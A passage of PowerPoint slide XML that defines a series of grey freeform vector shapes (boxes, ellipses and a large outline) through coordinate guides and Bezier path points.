                  <a:gd name="T9" fmla="*/ 289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3" h="289">
                    <a:moveTo>
                      <a:pt x="0" y="289"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="289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1" name="Freeform 1682"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="717" y="-6190"/>
                <a:ext cx="173" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 213"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 165 h 213"/>
                  <a:gd name="T4" fmla="*/ 173 w 173"/>
                  <a:gd name="T5" fmla="*/ 213 h 213"/>
                  <a:gd name="T6" fmla="*/ 173 w 173"/>
                  <a:gd name="T7" fmla="*/ 45 h 213"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9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3" h="213">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="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2" name="Freeform 1683"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="264" y="-6190"/>
                <a:ext cx="626" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 626"/>
                  <a:gd name="T1" fmla="*/ 120 h 168"/>
                  <a:gd name="T2" fmla="*/ 453 w 626"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 626 w 626"/>
                  <a:gd name="T5" fmla="*/ 45 h 168"/>
                  <a:gd name="T6" fmla="*/ 172 w 626"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 626"/>
                  <a:gd name="T9" fmla="*/ 12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6" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="168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3" name="Freeform 1684"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="436" y="-6145"/>
                <a:ext cx="454" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 454"/>
                  <a:gd name="T1" fmla="*/ 288 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 454"/>
                  <a:gd name="T3" fmla="*/ 123 h 288"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 0 h 288"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 168 h 288"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9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4" h="288">
                    <a:moveTo>
                      <a:pt x="0" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="288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4" name="Freeform 1685"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="264" y="-6070"/>
                <a:ext cx="172" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 172"/>
                  <a:gd name="T1" fmla="*/ 0 h 213"/>
                  <a:gd name="T2" fmla="*/ 0 w 172"/>
                  <a:gd name="T3" fmla="*/ 168 h 213"/>
                  <a:gd name="T4" fmla="*/ 172 w 172"/>
                  <a:gd name="T5" fmla="*/ 213 h 213"/>
                  <a:gd name="T6" fmla="*/ 172 w 172"/>
                  <a:gd name="T7" fmla="*/ 48 h 213"/>
                  <a:gd name="T8" fmla="*/ 0 w 172"/>
                  <a:gd name="T9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2" h="213">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="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5" name="Freeform 1686"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-187" y="-6070"/>
                <a:ext cx="623" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 623"/>
                  <a:gd name="T1" fmla="*/ 123 h 168"/>
                  <a:gd name="T2" fmla="*/ 451 w 623"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 623 w 623"/>
                  <a:gd name="T5" fmla="*/ 48 h 168"/>
                  <a:gd name="T6" fmla="*/ 172 w 623"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 623"/>
                  <a:gd name="T9" fmla="*/ 123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3" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="168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6" name="Freeform 1687"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-15" y="-6022"/>
                <a:ext cx="451" cy="286"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 451"/>
                  <a:gd name="T1" fmla="*/ 286 h 286"/>
                  <a:gd name="T2" fmla="*/ 0 w 451"/>
                  <a:gd name="T3" fmla="*/ 120 h 286"/>
                  <a:gd name="T4" fmla="*/ 451 w 451"/>
                  <a:gd name="T5" fmla="*/ 0 h 286"/>
                  <a:gd name="T6" fmla="*/ 451 w 451"/>
                  <a:gd name="T7" fmla="*/ 165 h 286"/>
                  <a:gd name="T8" fmla="*/ 0 w 451"/>
                  <a:gd name="T9" fmla="*/ 28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1" h="286">
                    <a:moveTo>
                      <a:pt x="0" y="286"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="165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7" name="Freeform 1688"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-187" y="-5947"/>
                <a:ext cx="172" cy="211"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 172"/>
                  <a:gd name="T1" fmla="*/ 0 h 211"/>
                  <a:gd name="T2" fmla="*/ 0 w 172"/>
                  <a:gd name="T3" fmla="*/ 166 h 211"/>
                  <a:gd name="T4" fmla="*/ 172 w 172"/>
                  <a:gd name="T5" fmla="*/ 211 h 211"/>
                  <a:gd name="T6" fmla="*/ 172 w 172"/>
                  <a:gd name="T7" fmla="*/ 45 h 211"/>
                  <a:gd name="T8" fmla="*/ 0 w 172"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="211">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="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8" name="Freeform 1689"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-641" y="-5947"/>
                <a:ext cx="626" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 626"/>
                  <a:gd name="T1" fmla="*/ 121 h 168"/>
                  <a:gd name="T2" fmla="*/ 454 w 626"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 626 w 626"/>
                  <a:gd name="T5" fmla="*/ 45 h 168"/>
                  <a:gd name="T6" fmla="*/ 173 w 626"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 626"/>
                  <a:gd name="T9" fmla="*/ 12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6" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="168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9" name="Freeform 1690"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-468" y="-5902"/>
                <a:ext cx="453" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 288 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 123 h 288"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 0 h 288"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 166 h 288"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
                  <a:gd name="T9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3" h="288">
                    <a:moveTo>
                      <a:pt x="0" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="288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0" name="Freeform 1691"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-641" y="-5826"/>
                <a:ext cx="173" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 212"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 165 h 212"/>
                  <a:gd name="T4" fmla="*/ 173 w 173"/>
                  <a:gd name="T5" fmla="*/ 212 h 212"/>
                  <a:gd name="T6" fmla="*/ 173 w 173"/>
                  <a:gd name="T7" fmla="*/ 47 h 212"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9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3" h="212">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="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1" name="Freeform 1692"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3109" y="-3776"/>
                <a:ext cx="864" cy="633"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 115 w 864"/>
                  <a:gd name="T1" fmla="*/ 633 h 633"/>
                  <a:gd name="T2" fmla="*/ 529 w 864"/>
                  <a:gd name="T3" fmla="*/ 503 h 633"/>
                  <a:gd name="T4" fmla="*/ 864 w 864"/>
                  <a:gd name="T5" fmla="*/ 166 h 633"/>
                  <a:gd name="T6" fmla="*/ 276 w 864"/>
                  <a:gd name="T7" fmla="*/ 0 h 633"/>
                  <a:gd name="T8" fmla="*/ 0 w 864"/>
                  <a:gd name="T9" fmla="*/ 296 h 633"/>
                  <a:gd name="T10" fmla="*/ 115 w 864"/>
                  <a:gd name="T11" fmla="*/ 633 h 6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64" h="633">
                    <a:moveTo>
                      <a:pt x="115" y="633"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="529" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="633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2" name="Freeform 1693"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-2743" y="-3622"/>
                <a:ext cx="940" cy="1032"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 317 w 398"/>
                  <a:gd name="T1" fmla="*/ 126 h 437"/>
                  <a:gd name="T2" fmla="*/ 87 w 398"/>
                  <a:gd name="T3" fmla="*/ 27 h 437"/>
                  <a:gd name="T4" fmla="*/ 87 w 398"/>
                  <a:gd name="T5" fmla="*/ 27 h 437"/>
                  <a:gd name="T6" fmla="*/ 22 w 398"/>
                  <a:gd name="T7" fmla="*/ 43 h 437"/>
                  <a:gd name="T8" fmla="*/ 35 w 398"/>
                  <a:gd name="T9" fmla="*/ 72 h 437"/>
                  <a:gd name="T10" fmla="*/ 76 w 398"/>
                  <a:gd name="T11" fmla="*/ 309 h 437"/>
                  <a:gd name="T12" fmla="*/ 188 w 398"/>
                  <a:gd name="T13" fmla="*/ 401 h 437"/>
                  <a:gd name="T14" fmla="*/ 205 w 398"/>
                  <a:gd name="T15" fmla="*/ 437 h 437"/>
                  <a:gd name="T16" fmla="*/ 291 w 398"/>
                  <a:gd name="T17" fmla="*/ 414 h 437"/>
                  <a:gd name="T18" fmla="*/ 291 w 398"/>
                  <a:gd name="T19" fmla="*/ 414 h 437"/>
                  <a:gd name="T20" fmla="*/ 331 w 398"/>
                  <a:gd name="T21" fmla="*/ 395 h 437"/>
                  <a:gd name="T22" fmla="*/ 317 w 398"/>
                  <a:gd name="T23" fmla="*/ 126 h 4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8" h="437">
                    <a:moveTo>
                      <a:pt x="317" y="126"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="252" y="39"/>
                      <a:pt x="154" y="0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0" y="131"/>
                      <a:pt x="14" y="228"/>
                      <a:pt x="76" y="309"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="352"/>
                      <a:pt x="148" y="383"/>
                      <a:pt x="188" y="401"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="306" y="410"/>
                      <a:pt x="319" y="404"/>
                      <a:pt x="331" y="395"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="398" y="344"/>
                      <a:pt x="392" y="224"/>
                      <a:pt x="317" y="12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3" name="Freeform 1694"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-2951" y="-3594"/>
                <a:ext cx="949" cy="1077"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 336 w 402"/>
                  <a:gd name="T1" fmla="*/ 405 h 456"/>
                  <a:gd name="T2" fmla="*/ 81 w 402"/>
                  <a:gd name="T3" fmla="*/ 320 h 456"/>
                  <a:gd name="T4" fmla="*/ 67 w 402"/>
                  <a:gd name="T5" fmla="*/ 51 h 456"/>
                  <a:gd name="T6" fmla="*/ 322 w 402"/>
                  <a:gd name="T7" fmla="*/ 137 h 456"/>
                  <a:gd name="T8" fmla="*/ 336 w 402"/>
                  <a:gd name="T9" fmla="*/ 405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2" h="456">
                    <a:moveTo>
                      <a:pt x="336" y="405"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="269" y="456"/>
                      <a:pt x="155" y="418"/>
                      <a:pt x="81" y="320"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="222"/>
                      <a:pt x="0" y="102"/>
                      <a:pt x="67" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="0"/>
                      <a:pt x="247" y="39"/>
                      <a:pt x="322" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="234"/>
                      <a:pt x="402" y="355"/>
                      <a:pt x="336" y="4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4" name="Freeform 1695"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-2765" y="-3381"/>
                <a:ext cx="579" cy="654"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 204 w 245"/>
                  <a:gd name="T1" fmla="*/ 246 h 277"/>
                  <a:gd name="T2" fmla="*/ 49 w 245"/>
                  <a:gd name="T3" fmla="*/ 194 h 277"/>
                  <a:gd name="T4" fmla="*/ 40 w 245"/>
                  <a:gd name="T5" fmla="*/ 30 h 277"/>
                  <a:gd name="T6" fmla="*/ 196 w 245"/>
                  <a:gd name="T7" fmla="*/ 82 h 277"/>
                  <a:gd name="T8" fmla="*/ 204 w 245"/>
                  <a:gd name="T9" fmla="*/ 246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5" h="277">
                    <a:moveTo>
                      <a:pt x="204" y="246"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="277"/>
                      <a:pt x="94" y="254"/>
                      <a:pt x="49" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="134"/>
                      <a:pt x="0" y="61"/>
                      <a:pt x="40" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="0"/>
                      <a:pt x="150" y="23"/>
                      <a:pt x="196" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="241" y="142"/>
                      <a:pt x="245" y="215"/>
                      <a:pt x="204" y="2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5" name="Freeform 1696"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4942" y="-6941"/>
                <a:ext cx="4072" cy="4370"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1724"/>
                  <a:gd name="T1" fmla="*/ 0 h 1850"/>
                  <a:gd name="T2" fmla="*/ 0 w 1724"/>
                  <a:gd name="T3" fmla="*/ 1128 h 1850"/>
                  <a:gd name="T4" fmla="*/ 0 w 1724"/>
                  <a:gd name="T5" fmla="*/ 1387 h 1850"/>
                  <a:gd name="T6" fmla="*/ 0 w 1724"/>
                  <a:gd name="T7" fmla="*/ 1388 h 1850"/>
                  <a:gd name="T8" fmla="*/ 381 w 1724"/>
                  <a:gd name="T9" fmla="*/ 1490 h 1850"/>
                  <a:gd name="T10" fmla="*/ 381 w 1724"/>
                  <a:gd name="T11" fmla="*/ 1489 h 1850"/>
                  <a:gd name="T12" fmla="*/ 825 w 1724"/>
                  <a:gd name="T13" fmla="*/ 1608 h 1850"/>
                  <a:gd name="T14" fmla="*/ 879 w 1724"/>
                  <a:gd name="T15" fmla="*/ 1426 h 1850"/>
                  <a:gd name="T16" fmla="*/ 1200 w 1724"/>
                  <a:gd name="T17" fmla="*/ 1534 h 1850"/>
                  <a:gd name="T18" fmla="*/ 1276 w 1724"/>
                  <a:gd name="T19" fmla="*/ 1730 h 1850"/>
                  <a:gd name="T20" fmla="*/ 1724 w 1724"/>
                  <a:gd name="T21" fmla="*/ 1850 h 1850"/>
                  <a:gd name="T22" fmla="*/ 1724 w 1724"/>
                  <a:gd name="T23" fmla="*/ 1849 h 1850"/>
                  <a:gd name="T24" fmla="*/ 1724 w 1724"/>
                  <a:gd name="T25" fmla="*/ 1591 h 1850"/>
                  <a:gd name="T26" fmla="*/ 1724 w 1724"/>
                  <a:gd name="T27" fmla="*/ 462 h 1850"/>
                  <a:gd name="T28" fmla="*/ 0 w 1724"/>
                  <a:gd name="T29" fmla="*/ 0 h 1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24" h="1850">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1128"/>
                      <a:pt x="0" y="1128"/>
                      <a:pt x="0" y="1128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1387"/>
                      <a:pt x="0" y="1387"/>
                      <a:pt x="0" y="1387"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1388"/>
                      <a:pt x="0" y="1388"/>
                      <a:pt x="0" y="1388"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="1490"/>
                      <a:pt x="381" y="1490"/>
                      <a:pt x="381" y="1490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="1490"/>
                      <a:pt x="381" y="1489"/>
                      <a:pt x="381" y="1489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="825" y="1608"/>
                      <a:pt x="825" y="1608"/>
                      <a:pt x="825" y="1608"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="811" y="1533"/>
                      <a:pt x="829" y="1464"/>
                      <a:pt x="879" y="1426"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="963" y="1362"/>
                      <a:pt x="1106" y="1411"/>
                      <a:pt x="1200" y="1534"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1248" y="1597"/>
                      <a:pt x="1273" y="1668"/>
                      <a:pt x="1276" y="1730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1724" y="1850"/>
                      <a:pt x="1724" y="1850"/>
                      <a:pt x="1724" y="1850"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1724" y="1849"/>
                      <a:pt x="1724" y="1849"/>
                      <a:pt x="1724" y="1849"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1724" y="1591"/>
                      <a:pt x="1724" y="1591"/>
                      <a:pt x="1724" y="1591"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1724" y="462"/>
                      <a:pt x="1724" y="462"/>
                      <a:pt x="1724" y="46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6" name="Freeform 1697"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4822" y="-6681"/>
                <a:ext cx="319" cy="87"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 319 w 319"/>
                  <a:gd name="T1" fmla="*/ 78 h 87"/>
                  <a:gd name="T2" fmla="*/ 33 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 87"/>
                  <a:gd name="T4" fmla="*/ 0 w 319"/>
                  <a:gd name="T5" fmla="*/ 9 h 87"/>
                  <a:gd name="T6" fmla="*/ 283 w 319"/>
                  <a:gd name="T7" fmla="*/ 87 h 87"/>
                  <a:gd name="T8" fmla="*/ 319 w 319"/>
                  <a:gd name="T9" fmla="*/ 78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9" h="87">
                    <a:moveTo>
                      <a:pt x="319" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="78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7" name="Freeform 1698"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4822" y="-6672"/>
                <a:ext cx="283" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 283 w 283"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 283 w 283"/>
                  <a:gd name="T3" fmla="*/ 78 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 283"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 283"/>
                  <a:gd name="T7" fmla="*/ 284 h 359"/>
                  <a:gd name="T8" fmla="*/ 283 w 283"/>
                  <a:gd name="T9" fmla="*/ 359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3" h="359">
                    <a:moveTo>
                      <a:pt x="283" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="359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8" name="Freeform 1699"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4539" y="-6603"/>
                <a:ext cx="36" cy="290"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 36"/>
                  <a:gd name="T1" fmla="*/ 0 h 290"/>
                  <a:gd name="T2" fmla="*/ 36 w 36"/>
                  <a:gd name="T3" fmla="*/ 283 h 290"/>
                  <a:gd name="T4" fmla="*/ 0 w 36"/>
                  <a:gd name="T5" fmla="*/ 290 h 290"/>
                  <a:gd name="T6" fmla="*/ 0 w 36"/>
                  <a:gd name="T7" fmla="*/ 9 h 290"/>
                  <a:gd name="T8" fmla="*/ 36 w 36"/>
                  <a:gd name="T9" fmla="*/ 0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90">
                    <a:moveTo>
                      <a:pt x="36" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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9" name="Freeform 1700"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4425" y="-6573"/>
                <a:ext cx="319" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 319 w 319"/>
                  <a:gd name="T1" fmla="*/ 76 h 85"/>
                  <a:gd name="T2" fmla="*/ 33 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 319"/>
                  <a:gd name="T5" fmla="*/ 7 h 85"/>
                  <a:gd name="T6" fmla="*/ 283 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 319 w 319"/>
                  <a:gd name="T9" fmla="*/ 7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9" h="85">
                    <a:moveTo>
                      <a:pt x="319" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
